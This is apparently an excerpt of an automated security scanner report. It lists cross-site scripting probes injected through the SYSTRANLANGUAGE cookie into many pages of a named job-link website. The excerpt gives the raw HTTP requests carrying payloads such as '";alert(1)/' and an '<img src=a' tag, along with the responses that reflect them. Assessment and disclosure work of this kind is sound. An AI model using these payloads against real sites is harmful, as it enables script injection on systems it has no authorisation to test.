| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8FD5";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_settings_dsp.cfm |
| GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=endab86"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:47 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_ssncheck.cfm |
| GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en54e5b"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN54E5B";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_ssncheck.cfm |
| GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enda9e7"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:38 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_veterans_dsp.cfm |
| GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene9b46"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENE9B46";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_veterans_dsp.cfm |
| GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en26637"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:38 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_warn_dsp.cfm |
| GET /ada/mn_warn_dsp.cfm?def Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en855f5"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_warn_dsp.cfm |
| GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en6ec58"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:31 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6EC58";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_warn_dsp.cfm |
| GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene0fe3"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_warn_dsp.cfm |
| GET /ada/mn_warn_dsp.cfm?def Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en206dd"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN206DD";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/services/schools |
| GET /ada/services/schools Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ena7915"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:27 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA7915";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/services/schools |
| GET /ada/services/schools Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en90722"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:17 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/FAQ.cfm |
| GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb39ba"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB39BA";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/FAQ.cfm |
| GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en60e38"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/Login.cfm |
| GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=enac724"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/Login.cfm |
| GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en49afa"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:09 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN49AFA";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/contactus.cfm |
| GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en990e3"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:56 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/contactus.cfm |
| GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en5fb25"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:05 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN5FB25";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/employero |
| GET /ada/works/employero Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2606f"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:38 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/employero |
| GET /ada/works/employero Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2b6c6"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:42 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2B6C6";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/joboverview |
| GET /ada/works/joboverview Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en81040"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:41 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/joboverview |
| GET /ada/works/joboverview Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2f340"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:45 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2F340";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/jobsearch.cfm |
| GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en9a6d8"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:40 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9A6D8";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/jobsearch.cfm |
| GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=end3d5b"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:37 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/linkview.cfm |
| GET /ada/works/linkview.cfm Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enc0e85"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:45 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/linkview.cfm |
| GET /ada/works/linkview.cfm Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=encd58c"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENCD58C";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/resources |
| GET /ada/works/resources Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en14e61"><img%20src%3da |
